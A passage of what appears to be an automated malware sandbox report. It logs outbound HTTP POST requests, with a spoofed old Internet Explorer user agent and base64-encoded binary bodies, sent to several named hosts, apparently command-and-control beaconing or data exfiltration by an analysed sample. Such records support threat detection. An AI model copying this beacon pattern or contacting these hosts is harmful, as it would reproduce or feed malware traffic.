4e 6d 76 69 62 71 5a 50 41 77 41 73 76 69 6c 79 6a 50 75 2f 32 41 74 56 76 43 30 74 4e 67 53 2b 75 65 72 35 75 43 76 62 77 59 46 59 39 76 4b 35 35 4d 75 2f 41 59 45 54 39 4c 4f 68 66 37 52 4f 62 65 47 39 45 73 4c 67 68 5a 44 4d 4c 37 42 70 42 70 34 43 79 58 30 75 75 69 54 78 75 45 52 56 54 78 4d 2f 47 44 53 43 73 7a 31 64 52 48 44 77 2b 34 6d 63 6c 6e 75 4b 50 63 78 65 58 67 50 39 79 69 69 75 67 52 62 30 31 49 30 58 57 71 6b 6c 62 49 55 62 48 51 6f 6e 4e 36 43 47 44 48 4a 48 34 36 4c 37 63 70 50 53 73 68 2b 36 4a 50 31 6b 74 41 65 4b 36 74 57 43 6e 67 31 74 43 6e 71 48 6b 64 51 4f 6d 77 76 6c 57 34 2b 73 70 4d 63 44 79 4d 78 72 47 70 2f 6b 6a 51 79 7a 32 6c 41 33 47 59 66 6b 65 57 74 79 44 64 57 66 7a 33 78 39 74 37 49 4d 55 54 38 45 47 78 7a 50 52 50 58 6b 72 63 61 4a 63 6f 49 61 77 74 62 33 79 6c 62 50 69 74 4a 44 68 69 4e 46 7a 77 42 51 67 76 51 77 79 53 74 54 77 61 62 71 73 50 78 50 68 45 49 56 55 6d 6a 51 74 34 66 6a 76 4f 76 6a 4e 47 54 5a 56 51 76 2b 74 45 48 59 57 70 47 2b 72 69 67 44 30 69 51 44 62 76 49 75 4c 6f 4b 36 50 2f 4e 2f 4b 42 4b 4e 41 75 61 72 30 41 4a 55 2b 6f 77 6f 51 37 72 64 49 66 2f 4b 46 5a 4c 6f 4c 47 34 78 62 6b 30 61 68 6d 43 50 77 50 57 66 41 42 66 6e 39 76 34 41 61 69 39 49 67 69 6d 49 3d Data Ascii: 1HG6c1OzVM/b8T8EGiBKBvxc1EU5/MWsN279NL8Nq+CiFFGEpjxN5liwWJtgrfmUapHxtaZOePFAwKVeFoz2WqEB7zRrXBjVhelTVYCaq/n8M1kKcC5Ns8oeY0qEFYsQFFe1PW6Omh9LO3cInja4lUwi7biNmvibqZPAwAsvilyjPu/2AtVvC0tNgS+uer5uCvbwYFY9vK55Mu/AYET9LOhf7RObeG9EsLghZDML7BpBp4CyX0uuiTxuERVTxM/GDSCsz1dRHDw+4mclnuKPcxeXgP9yiiugRb01I0XWqklbIUbHQonN6CGDHJH46L7cpPSsh+6JP1ktAeK6tWCng1tCnqHkdQOmwvlW4+spMcDyMxrGp/kjQyz2lA3GYfkeWtyDdWfz3x9t7IMUT8EGxzPRPXkrcaJcoIawtb3ylbPitJDhiNFzwBQgvQwyStTwabqsPxPhEIVUmjQt4fjvOvjNGTZVQv+tEHYWpG+rigD0iQDbvIuLoK6P/N/KBKNAuar0AJU+owoQ7rdIf/KFZLoLG4xbk0ahmCPwPWfABfn9v4Aai9IgimI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 6c 57 78 71 4c 50 41 43 59 38 39 68 72 4b 58 6f 41 37 6b 52 67 61 4e 62 4f 2f 6d 59 5a 50 74 4b 4a 43 6b 6b 54 63 2b 33 54 72 64 79 4a 6b 65 4c 38 4f 48 38 4f 39 4b 70 77 76 42 51 56 70 33 52 71 66 38 49 72 64 58 4f 30 44 6a 6e 64 49 4f 32 4f 4e 71 6d 32 4c 35 33 45 48 6e 39 75 55 57 37 4f 4b 31 50 67 32 4e 49 7a 75 73 67 32 2f 4e 2f 39 44 68 75 2f 71 36 4d 64 63 66 68 48 72 2b 2f 72 78 51 72 6d 6b 4f 71 41 42 6f 61 31 34 79 44 30 74 6c 76 30 6f 35 51 70 74 43 69 55 44 73 39 45 72 50 53 65 63 77 33 6b 55 36 2b 61 33 34 55 49 52 41 34 4d 6d 4a 68 44 30 6e 51 54 58 76 41 69 4e 55 63 47 31 4f 6a 55 4f 47 6e 6d 44 69 70 50 53 75 4e 35 58 43 36 6e 43 67 49 57 34 78 5a 53 36 72 4c 59 4c 66 75 58 6f 71 73 6c 31 7a 48 79 44 72 59 64 6e 65 56 44 46 6b 71 41 35 53 6f 44 72 55 53 34 59 4f 77 30 49 75 78 6e 54 34 44 4c 72 4b 48 73 2f 66 51 44 76 71 57 4e 41 51 78 6e 56 67 2f 31 55 66 67 76 53 78 4c 38 69 37 63 58 78 71 37 33 6f 54 46 69 6b 6c 68 37 2b 43 52 45 2b 2b 54 55 30 73 70 4c 42 4c 43 71 78 65 2b 72 6f 43 30 79 71 76 39 38 41 46 64 62 73 65 59 61 38 45 59 6f 63 63 46 57 65 36 6b 5a 32 79 36 31 30 64 2f 44 69 66 61 55 42 59 75 39 4d 2f 6f 67 70 61 79 48 6b 65 55 43 6b 4a 4d 4a 43 38 2b 53 46 51 6e 76 34 42 43 4c 45 6b 75 4b 4e 55 39 72 4e 32 46 6c 66 66 68 58 51 42 55 6e 55 58 62 62 6c 4f 42 73 4b 57 46 53 42 57 2f 42 78 71 6a 46 56 38 6f 66 2b 4f 54 68 30 79 57 4d 76 6e 32 51 6c 37 36 72 45 2f 53 48 44 69 38 4c 6e 4b 38 59 63 66 51 34 74 2f 54 73 46 6b 64 45 38 41 62 50 6f 4b 63 4f 72 70 52 69 67 70 61 65 67 4b 77 72 55 55 47 71 4d 7a 48 56 47 62 43 69 52 54 55 68 42 37 4c 6a 63 55 32 73 51 46 4f 4f 57 50 4f 79 39 61 61 4a 36 54 44 6a 74 78 51 42 57 4d 71 6c 46 6e 45 36 79 6a 71 49 36 59 33 6e 66 39 4f 62 72 43 6e 4e 58 36 44 38 77 4d 4c Data Ascii: lWxqLPACY89hrKXoA7kRgaNbO/mYZPtKJCkkTc+3TrdyJkeL8OH8O9KpwvBQVp3Rqf8IrdXO0DjndIO2ONqm2L53EHn9uUW7OK1Pg2NIzusg2/N/9Dhu/q6MdcfhHr+/rxQrmkOqABoa14yD0tlv0o5QptCiUDs9ErPSecw3kU6+a34UIRA4MmJhD0nQTXvAiNUcG1OjUOGnmDipPSuN5XC6nCgIW4xZS6rLYLfuXoqsl1zHyDrYdneVDFkqA5SoDrUS4YOw0IuxnT4DLrKHs/fQDvqWNAQxnVg/1UfgvSxL8i7cXxq73oTFiklh7+CRE++TU0spLBLCqxe+roC0yqv98AFdbseYa8EYoccFWe6kZ2y610d/DifaUBYu9M/ogpayHkeUCkJMJC8+SFQnv4BCLEkuKNU9rN2FlffhXQBUnUXbblOBsKWFSBW/BxqjFV8of+OTh0yWMvn2Ql76rE/SHDi8LnK8YcfQ4t/TsFkdE8AbPoKcOrpRigpaegKwrUUGqMzHVGbCiRTUhB7LjcU2sQFOOWPOy9aaJ6TDjtxQBWMqlFnE6yjqI6Y3nf9ObrCnNX6D8wML
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 52 59 52 6b 4d 41 41 6b 59 38 39 39 34 45 6d 6e 30 38 66 50 79 44 50 76 73 72 44 6f 67 75 69 70 4e 42 4f 63 6d 39 4d 51 58 73 48 62 32 38 4f 77 5a 43 79 42 71 68 32 4c 53 4f 51 58 50 4a 2f 39 56 79 51 6f 6e 7a 46 62 32 6d 6a 50 6d 39 6e 57 33 72 4b 71 43 38 73 51 4e 73 71 67 37 32 6d 30 73 35 59 4a 63 45 44 37 35 56 30 4d 75 7a 4d 4d 6a 49 34 38 75 6c 63 45 6c 63 42 54 68 33 66 68 2b 79 31 30 44 64 35 6e 39 78 46 68 77 50 54 6c 64 34 4e 4d 65 78 6e 50 39 78 59 55 34 73 6c 49 4c 4c 36 70 33 65 74 32 4a 59 68 2b 4f 77 6a 4e 50 4c 64 2b 73 34 38 59 70 48 66 4e 38 2f 39 5a 43 35 6b 56 6e 46 4a 53 6a 31 63 59 77 67 78 51 73 65 79 74 6d 66 77 59 57 65 55 49 6a 31 67 4e 44 77 46 39 6c 4c 6c 38 4f 47 4c 49 72 78 2b 42 74 4a 4e 43 61 78 70 67 72 73 6c 71 59 45 4c 32 57 37 2f 7a 51 4b 39 64 51 64 51 36 4f 47 38 30 37 56 77 57 6f 79 77 6f 65 5a 53 6b 72 54 6e 68 55 6f 49 56 71 4f 46 76 47 31 45 61 76 71 33 2b 74 75 62 59 6c 45 69 2f 71 4c 38 42 72 59 64 32 62 48 72 6a 54 67 6f 72 43 71 57 77 44 78 47 50 59 30 34 47 5a 54 69 38 33 6e 65 45 78 4a 4e 45 72 43 56 58 54 6a 62 67 73 56 4b 44 62 79 34 75 51 6d 76 67 6e 35 39 53 6c 4f 68 6c 5a 6f 44 71 35 6a 47 6c 4e 5a 44 54 6a 71 39 2b 31 31 74 4c 77 34 46 48 6a 4a 6b 35 6a 66 4d 53 6e 4e 52 4a 79 77 52 72 74 58 4c 2f 4a 43 65 65 6b 4c 39 43 68 62 38 48 34 32 6b 50 2b 4c 75 7a 39 6f 77 76 33 78 6e 31 6c 62 33 77 58 55 68 66 46 75 34 6a 59 49 32 6b 62 4e 68 6c 42 41 67 6f 7a 78 59 50 30 54 6a 44 66 37 45 6d 57 50 64 77 64 4c 39 78 49 62 51 37 38 65 44 48 50 6f 4e 32 75 73 44 79 75 67 54 6c 49 6d 47 6e 56 32 6c 46 42 55 43 6b 43 4d 30 77 77 36 57 4d 35 54 6d 73 63 6b 65 58 75 2f 64 4e 30 32 68 37 58 78 56 38 2b 33 35 4b 49 4b 7a 37 45 68 39 42 47 67 3d 3d Data Ascii: RYRkMAAkY8994Emn08fPyDPvsrDoguipNBOcm9MQXsHb28OwZCyBqh2LSOQXPJ/9VyQonzFb2mjPm9nW3rKqC8sQNsqg72m0s5YJcED75V0MuzMMjI48ulcElcBTh3fh+y10Dd5n9xFhwPTld4NMexnP9xYU4slILL6p3et2JYh+OwjNPLd+s48YpHfN8/9ZC5kVnFJSj1cYwgxQseytmfwYWeUIj1gNDwF9lLl8OGLIrx+BtJNCaxpgrslqYEL2W7/zQK9dQdQ6OG807VwWoywoeZSkrTnhUoIVqOFvG1Eavq3+tubYlEi/qL8BrYd2bHrjTgorCqWwDxGPY04GZTi83neExJNErCVXTjbgsVKDby4uQmvgn59SlOhlZoDq5jGlNZDTjq9+11tLw4FHjJk5jfMSnNRJywRrtXL/JCeekL9Chb8H42kP+Luz9owv3xn1lb3wXUhfFu4jYI2kbNhlBAgozxYP0TjDf7EmWPdwdL9xIbQ78eDHPoN2usDyugTlImGnV2lFBUCkCM0ww6WM5TmsckeXu/dN02h7XxV8+35KIKz7Eh9BGg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 35 71 62 34 64 6b 6e 4f 56 4d 38 63 4c 43 76 37 6d 49 4d 50 73 32 4b 52 5a 6b 39 6e 69 51 69 49 6a 61 32 6e 73 55 4e 39 58 6c 63 32 41 42 37 54 6b 59 68 56 74 66 77 72 30 4e 79 76 7a 6d 49 37 43 54 39 4a 70 72 36 39 73 30 58 64 66 37 65 48 62 4a 68 59 5a 37 38 7a 6d 4e 6a 35 6f 68 4c 44 4b 6a 45 77 70 76 72 61 44 4f 6e 48 65 4e 78 52 4f 58 50 6a 4c 42 43 7a 2f 45 68 2b 4f 72 6b 48 78 6d 74 2b 47 35 45 52 75 41 4f 55 73 55 39 49 76 66 6b 54 6d 67 59 4f 6f 38 72 79 64 6b 54 7a 71 2b 69 37 52 6f 48 4b 6f 71 53 38 7a 51 30 70 78 44 46 63 52 6e 6c 78 73 4b 50 4e 73 77 2b 68 53 58 4e 42 59 4f 75 74 55 49 63 78 42 4e 68 30 36 74 32 6c 4f 41 37 78 31 73 33 44 47 6e 76 31 77 43 61 51 35 45 49 53 65 31 44 32 4e 42 5a 6f 46 6b 62 78 7a 35 52 32 45 58 75 6d 75 70 33 4e 58 70 34 61 31 67 46 2b 4a 7a 37 69 45 79 43 75 43 73 47 6f 4b 6b 34 43 31 53 4b 34 61 45 2f 4d 5a 35 6e 46 5a 79 30 7a 56 54 6e 46 35 53 58 42 45 5a 57 6d 78 74 34 6d 38 47 64 53 58 36 39 75 30 36 70 36 44 65 4f 71 39 62 45 46 6a 32 50 4e 66 6e 4b 76 73 6e 63 49 32 69 2b 32 6d 63 70 49 45 76 61 37 6b 2f 7a 74 55 59 78 4d 54 5a 65 70 47 62 6d 35 63 6f 57 55 52 43 6a 32 53 69 4a 4c 2f 71 79 42 58 5a 64 32 62 6d 44 5a 4a 64 7a 6a 67 42 75 75 71 63 37 68 64 4a 6b 47 36 49 37 79 2b 45 79 4c 50 6a 38 6d 59 48 59 43 67 42 58 6b 7a 63 31 55 64 66 54 64 71 7a 62 51 78 61 6a 38 5a 68 61 65 50 6c 4d 71 68 58 6d 58 75 33 6b 48 73 35 46 46 48 64 6b 52 44 4b 65 68 6d 6d 41 58 74 6b 36 36 34 44 4f 42 38 5a 45 73 35 59 43 59 34 52 59 30 31 31 67 36 45 4c 43 48 35 4b 78 76 4f 33 58 64 42 31 55 65 51 5a 49 6a 73 6b 38 63 59 58 61 48 37 4b 45 67 34 56 4a 4d 6c 67 3d 3d Data Ascii: 5qb4dknOVM8cLCv7mIMPs2KRZk9niQiIja2nsUN9Xlc2AB7TkYhVtfwr0NyvzmI7CT9Jpr69s0Xdf7eHbJhYZ78zmNj5ohLDKjEwpvraDOnHeNxROXPjLBCz/Eh+OrkHxmt+G5ERuAOUsU9IvfkTmgYOo8rydkTzq+i7RoHKoqS8zQ0pxDFcRnlxsKPNsw+hSXNBYOutUIcxBNh06t2lOA7x1s3DGnv1wCaQ5EISe1D2NBZoFkbxz5R2EXumup3NXp4a1gF+Jz7iEyCuCsGoKk4C1SK4aE/MZ5nFZy0zVTnF5SXBEZWmxt4m8GdSX69u06p6DeOq9bEFj2PNfnKvsncI2i+2mcpIEva7k/ztUYxMTZepGbm5coWURCj2SiJL/qyBXZd2bmDZJdzjgBuuqc7hdJkG6I7y+EyLPj8mYHYCgBXkzc1UdfTdqzbQxaj8ZhaePlMqhXmXu3kHs5FFHdkRDKehmmAXtk664DOB8ZEs5YCY4RY011g6ELCH5KxvO3XdB1UeQZIjsk8cYXaH7KEg4VJMlg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 35 5a 71 61 4b 75 44 7a 59 73 39 77 36 79 46 2f 4d 35 57 41 41 68 4f 71 52 7a 68 49 77 4d 73 4f 46 44 48 30 6b 4a 45 30 51 34 72 54 4d 4d 79 45 74 39 37 58 41 66 2b 4c 47 62 38 52 4a 66 55 4a 30 34 45 69 72 71 55 52 31 4e 59 63 50 70 64 52 4a 37 55 73 6d 5a 46 42 42 53 44 5a 6e 53 51 6e 58 44 36 38 39 58 74 4d 74 64 78 62 42 6a 6e 52 59 39 32 35 51 59 6a 73 64 70 49 52 6a 48 33 65 56 2b 35 56 50 50 4b 68 68 64 37 4e 47 4d 75 54 68 41 6a 6b 45 69 4c 70 6e 68 33 4a 78 53 32 55 70 74 79 56 38 6e 76 5a 4c 75 78 77 46 4c 45 4a 35 73 56 31 6f 55 64 7a 70 74 49 64 73 32 5a 37 5a 6e 54 7a 49 6e 37 75 6c 37 6d 68 52 63 55 55 61 58 38 4b 6f 57 2b 50 6d 32 48 32 39 4c 67 55 66 49 45 44 64 4e 70 2b 32 55 62 51 39 31 4f 56 66 52 48 64 5a 71 41 65 6b 38 6f 31 79 30 71 6c 45 44 51 47 65 59 78 30 59 4d 35 79 47 57 38 39 73 51 55 77 56 73 42 59 48 53 66 31 49 4f 79 41 6b 48 64 55 54 6d 6a 35 45 77 52 79 35 57 31 33 77 61 77 6e 79 61 50 45 36 35 6c 71 46 68 64 57 46 56 54 76 45 71 44 4a 71 39 7a 53 63 35 7a 6a 54 44 4c 69 76 53 49 4f 45 61 6d 43 37 62 56 39 72 55 2f 49 4a 58 4c 5a 38 39 6a 59 61 55 31 43 38 74 6d 2b 64 36 36 55 78 4a 6a 79 31 65 55 42 33 53 34 37 4f 78 58 36 52 4c 5a 4c 34 58 57 38 74 51 76 63 65 70 73 30 5a 2b 53 70 64 73 54 70 72 72 2f 42 51 75 58 31 4c 6f 64 49 4f 53 54 69 69 39 43 73 62 31 58 31 64 2b 65 6c 4f 51 79 69 31 6a 6d 43 6a 55 31 4c 4d 71 37 6d 33 51 65 70 35 72 6e 59 59 6c 52 41 4d 54 7a 65 2f 73 32 53 4f 6f 67 57 55 73 54 48 59 78 44 7a 65 4a 4e 74 78 43 7a 63 37 44 79 6a 6f 54 76 48 69 2b 62 54 4b 6a 46 6b 6d 50 6d 4e 52 39 4d 68 48 57 6a 47 68 41 4d 2f Data Ascii: 5ZqaKuDzYs9w6yF/M5WAAhOqRzhIwMsOFDH0kJE0Q4rTMMyEt97XAf+LGb8RJfUJ04EirqUR1NYcPpdRJ7UsmZFBBSDZnSQnXD689XtMtdxbBjnRY925QYjsdpIRjH3eV+5VPPKhhd7NGMuThAjkEiLpnh3JxS2UptyV8nvZLuxwFLEJ5sV1oUdzptIds2Z7ZnTzIn7ul7mhRcUUaX8KoW+Pm2H29LgUfIEDdNp+2UbQ91OVfRHdZqAek8o1y0qlEDQGeYx0YM5yGW89sQUwVsBYHSf1IOyAkHdUTmj5EwRy5W13wawnyaPE65lqFhdWFVTvEqDJq9zSc5zjTDLivSIOEamC7bV9rU/IJXLZ89jYaU1C8tm+d66UxJjy1eUB3S47OxX6RLZL4XW8tQvceps0Z+SpdsTprr/BQuX1LodIOSTii9Csb1X1d+elOQyi1jmCjU1LMq7m3Qep5rnYYlRAMTze/s2SOogWUsTHYxDzeJNtxCzc7DyjoTvHi+bTKjFkmPmNR9MhHWjGhAM/
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 52 59 52 6b 4d 41 41 6b 59 38 39 39 34 45 6d 6e 30 38 66 50 79 44 50 76 73 72 44 6f 67 75 69 70 4e 42 4f 63 6d 39 4d 51 58 73 48 62 32 38 4f 77 5a 43 79 42 71 68 32 4c 53 4f 51 58 50 4a 2f 39 56 79 51 6f 6e 7a 46 62 32 6d 6a 50 6d 39 6e 57 33 72 4b 71 43 38 73 51 4e 73 71 67 37 32 6d 30 73 35 59 4a 63 45 44 37 35 56 30 4d 75 7a 4d 4d 6a 49 34 38 75 6c 63 45 6c 63 42 54 68 33 66 68 2b 79 31 30 44 64 35 6e 39 78 46 68 77 50 54 6c 64 34 4e 4d 65 78 6e 50 39 78 59 55 34 73 6c 49 4c 4c 36 70 33 65 74 32 4a 59 68 2b 4f 77 6a 4e 50 4c 64 2b 73 34 38 59 70 48 66 4e 38 2f 39 5a 43 35 6b 56 6e 46 4a 53 6a 31 63 59 77 67 78 51 73 65 79 74 6d 66 77 59 57 65 55 49 6a 31 67 4e 44 77 46 39 6c 4c 6c 38 4f 47 4c 49 72 78 2b 42 74 4a 4e 43 61 78 70 67 72 73 6c 71 59 45 4c 32 57 37 2f 7a 51 4b 39 64 51 64 51 36 4f 47 38 30 37 56 77 57 6f 79 77 6f 65 5a 53 6b 72 54 6e 68 55 6f 49 56 71 4f 46 76 47 31 45 61 76 71 33 2b 74 75 62 59 6c 45 69 2f 71 4c 38 42 72 59 64 32 62 48 72 6a 54 67 6f 72 43 71 57 77 44 78 47 50 59 30 34 47 5a 54 69 38 33 6e 65 45 78 4a 4e 45 72 43 56 58 54 6a 62 67 73 56 4b 44 62 79 34 75 51 6d 76 67 6e 35 39 53 6c 4f 68 6c 5a 6f 44 71 35 6a 47 6c 4e 5a 44 54 6a 71 39 2b 31 31 74 4c 77 34 46 48 6a 4a 6b 35 6a 66 4d 53 6e 4e 52 4a 79 77 52 72 74 58 4c 2f 4a 43 65 65 6b 4c 39 43 68 62 38 48 34 32 6b 50 2b 4c 75 7a 39 6f 77 76 33 78 6e 31 6c 62 33 77 58 55 68 66 46 75 34 6a 59 49 32 6b 62 4e 68 6c 42 41 67 6f 7a 78 59 50 30 54 6a 44 66 37 45 6d 57 50 64 77 64 4c 39 78 49 62 51 37 38 65 44 48 50 6f 4e 32 75 73 44 79 75 67 54 6c 49 6d 47 6e 56 32 6c 46 42 55 43 6b 43 4d 30 77 77 36 57 4d 35 54 6d 73 63 6b 65 58 75 2f 64 4e 30 32 68 37 58 78 56 38 2b 33 35 4b 49 4b 7a 37 45 68 39 42 47 67 3d 3d Data Ascii: RYRkMAAkY8994Emn08fPyDPvsrDoguipNBOcm9MQXsHb28OwZCyBqh2LSOQXPJ/9VyQonzFb2mjPm9nW3rKqC8sQNsqg72m0s5YJcED75V0MuzMMjI48ulcElcBTh3fh+y10Dd5n9xFhwPTld4NMexnP9xYU4slILL6p3et2JYh+OwjNPLd+s48YpHfN8/9ZC5kVnFJSj1cYwgxQseytmfwYWeUIj1gNDwF9lLl8OGLIrx+BtJNCaxpgrslqYEL2W7/zQK9dQdQ6OG807VwWoywoeZSkrTnhUoIVqOFvG1Eavq3+tubYlEi/qL8BrYd2bHrjTgorCqWwDxGPY04GZTi83neExJNErCVXTjbgsVKDby4uQmvgn59SlOhlZoDq5jGlNZDTjq9+11tLw4FHjJk5jfMSnNRJywRrtXL/JCeekL9Chb8H42kP+Luz9owv3xn1lb3wXUhfFu4jYI2kbNhlBAgozxYP0TjDf7EmWPdwdL9xIbQ78eDHPoN2usDyugTlImGnV2lFBUCkCM0ww6WM5TmsckeXu/dN02h7XxV8+35KIKz7Eh9BGg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 67 62 32 48 4c 54 51 4d 59 38 2b 6f 68 57 64 61 6a 30 70 6e 62 49 66 6c 64 52 38 73 63 63 46 72 71 49 79 71 47 69 78 47 6f 71 4f 78 59 36 51 52 65 56 4a 54 4c 73 43 53 74 46 4c 69 51 6f 70 39 49 6f 6c 42 46 39 49 4a 71 34 53 54 72 50 51 7a 79 49 33 57 71 2b 67 33 72 79 34 4b 48 54 32 5a 66 4c 6c 44 6f 31 4e 4f 4b 6c 50 74 31 41 2b 71 59 64 36 41 4d 6b 7a 51 31 52 4b 50 57 45 46 52 5a 6b 6e 58 6b 4a 63 34 4d 6f 37 78 4e 7a 72 51 59 4a 64 4d 6a 6e 6c 36 62 67 4d 36 50 72 58 32 78 30 43 54 57 79 5a 6c 7a 68 34 30 5a 67 42 62 6a 67 78 4c 34 4d 2b 44 53 6b 68 6a 32 79 42 64 79 76 6e 30 34 61 74 69 4d 46 5a 76 43 30 6a 57 65 4a 69 4f 6a 53 57 6e 76 50 36 36 4c 36 56 41 68 5a 34 6b 43 53 34 56 45 59 73 71 35 37 6c 50 6c 64 48 5a 57 41 49 43 44 4a 37 30 30 31 75 6b 2b 42 6c 64 4e 4b 66 30 51 32 59 65 62 57 74 75 4e 66 65 53 76 2b 68 48 37 6d 56 59 77 2f 76 66 34 6c 6a 49 70 59 70 58 69 30 66 4e 5a 6c 76 49 49 56 6f 63 35 57 6b 50 37 6c 6c 43 4f 50 79 51 38 71 46 34 58 49 58 46 75 31 35 6e 43 2b 36 70 6e 4b 50 5a 72 4a 49 73 55 70 46 6e 62 36 59 53 71 37 50 2f 39 4d 73 35 65 45 6b 56 6a 34 53 61 63 6f 59 51 52 57 37 4f 6d 4a 69 71 62 79 67 4e 7a 4b 35 48 6f 54 54 51 79 63 2b 44 31 78 58 65 43 6a 4d 6c 67 48 32 2b 52 2f 44 73 79 63 4f 63 33 66 4b 55 30 78 42 6b 68 42 79 37 54 66 37 6e 4b 70 77 44 61 77 4b 61 50 6d 30 2f 65 65 4b 57 48 32 71 35 74 4b 42 50 79 66 32 55 47 5a 50 70 2b 57 54 35 52 66 64 43 31 30 43 55 6f 70 34 76 72 78 32 78 50 6a 5a 65 43 38 4f 6b 55 6a 66 30 61 76 46 35 4d 48 5a 6d 33 63 41 43 48 76 48 35 30 44 75 6c 55 4f 6d 58 54 6e 4b 34 6f 7a 70 37 63 41 3d 3d Data Ascii: gb2HLTQMY8+ohWdaj0pnbIfldR8sccFrqIyqGixGoqOxY6QReVJTLsCStFLiQop9IolBF9IJq4STrPQzyI3Wq+g3ry4KHT2ZfLlDo1NOKlPt1A+qYd6AMkzQ1RKPWEFRZknXkJc4Mo7xNzrQYJdMjnl6bgM6PrX2x0CTWyZlzh40ZgBbjgxL4M+DSkhj2yBdyvn04atiMFZvC0jWeJiOjSWnvP66L6VAhZ4kCS4VEYsq57lPldHZWAICDJ7001uk+BldNKf0Q2YebWtuNfeSv+hH7mVYw/vf4ljIpYpXi0fNZlvIIVoc5WkP7llCOPyQ8qF4XIXFu15nC+6pnKPZrJIsUpFnb6YSq7P/9Ms5eEkVj4SacoYQRW7OmJiqbygNzK5HoTTQyc+D1xXeCjMlgH2+R/DsycOc3fKU0xBkhBy7Tf7nKpwDawKaPm0/eeKWH2q5tKBPyf2UGZPp+WT5RfdC10CUop4vrx2xPjZeC8OkUjf0avF5MHZm3cACHvH50DulUOmXTnK4ozp7cA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 36 70 6c 64 46 59 32 54 61 73 2f 6d 50 6a 39 58 42 4a 39 6e 70 45 59 2f 69 6e 50 37 4d 63 30 71 45 59 55 67 42 4b 62 65 31 63 30 55 65 69 6e 49 51 50 7a 41 39 52 78 47 37 55 75 55 77 64 71 64 34 33 4f 34 79 37 38 49 68 77 31 37 7a 62 59 36 56 78 46 6f 47 74 55 76 76 71 44 54 4b 41 5a 70 75 6c 71 6a 4d 47 75 76 55 4a 44 49 67 6c 44 4c 69 7a 4c 4e 46 6f 43 47 4d 6a 52 47 67 65 31 55 30 4b 42 41 4a 68 34 57 7a 35 53 62 53 39 2b 37 6f 4b 56 67 36 47 2b 6c 31 73 41 56 51 45 5a 61 6e 4b 6f 43 37 62 5a 4b 69 49 44 6f 46 77 36 75 51 35 2f 51 66 4e 72 53 57 41 4b 64 58 4c 4e 65 70 4c 33 73 71 4e 58 4f 55 45 4f 4a 31 61 4a 51 44 6f 76 37 65 6f 30 45 6f 44 6d 72 75 63 50 74 79 43 35 37 7a 78 72 45 54 34 33 39 69 62 69 4f 37 67 50 41 68 6f 6c 66 38 50 44 37 61 63 44 30 75 70 64 39 36 42 59 39 57 75 63 69 36 65 59 6d 71 2f 71 34 4d 61 76 33 49 77 6d 4d 72 43 4c 69 4c 38 6d 62 36 76 59 43 2b 6e 4b 41 32 6e 2b 70 6e 72 53 4a 4d 54 7a 54 34 4b 76 59 74 54 42 79 2f 4d 30 35 74 50 5a 5a 57 33 5a 59 77 51 64 44 74 33 52 71 4d 48 66 38 36 4f 32 79 56 59 30 79 55 4d 4a 33 4b 67 59 4d 67 6d 42 52 41 4a 68 63 6c 42 75 57 66 77 31 74 49 4c 74 33 51 6f 45 65 7a 4e 37 49 79 63 6f 39 53 38 47 41 52 33 68 4b 6a 74 65 58 67 70 4f 65 72 58 32 2f 33 69 78 57 51 4d 78 31 77 7a 79 6a 79 52 67 61 63 36 42 59 33 47 41 49 73 44 57 74 48 58 31 73 45 52 38 56 48 42 6f 61 53 35 45 73 6c 7a 4f 47 4e 4d 4e 77 6a 75 76 56 33 2b 31 63 4d 64 6d 7a 58 73 6f 43 62 77 77 4a 34 4d 6b 6d 76 47 58 76 6e 70 35 54 59 45 5a 42 64 6c 31 2f 50 4d 70 4b 41 4e 66 51 77 2b 41 4b 68 79 71 58 6b 69 77 44 44 2f 2b 2f 54 53 79 77 34 4c 53 33 65 51 3d 3d Data Ascii: 6pldFY2Tas/mPj9XBJ9npEY/inP7Mc0qEYUgBKbe1c0UeinIQPzA9RxG7UuUwdqd43O4y78Ihw17zbY6VxFoGtUvvqDTKAZpulqjMGuvUJDIglDLizLNFoCGMjRGge1U0KBAJh4Wz5SbS9+7oKVg6G+l1sAVQEZanKoC7bZKiIDoFw6uQ5/QfNrSWAKdXLNepL3sqNXOUEOJ1aJQDov7eo0EoDmrucPtyC57zxrET439ibiO7gPAholf8PD7acD0upd96BY9Wuci6eYmq/q4Mav3IwmMrCLiL8mb6vYC+nKA2n+pnrSJMTzT4KvYtTBy/M05tPZZW3ZYwQdDt3RqMHf86O2yVY0yUMJ3KgYMgmBRAJhclBuWfw1tILt3QoEezN7Iyco9S8GAR3hKjteXgpOerX2/3ixWQMx1wzyjyRgac6BY3GAIsDWtHX1sER8VHBoaS5EslzOGNMNwjuvV3+1cMdmzXsoCbwwJ4MkmvGXvnp5TYEZBdl1/PMpKANfQw+AKhyqXkiwDD/+/TSyw4LS3eQ==
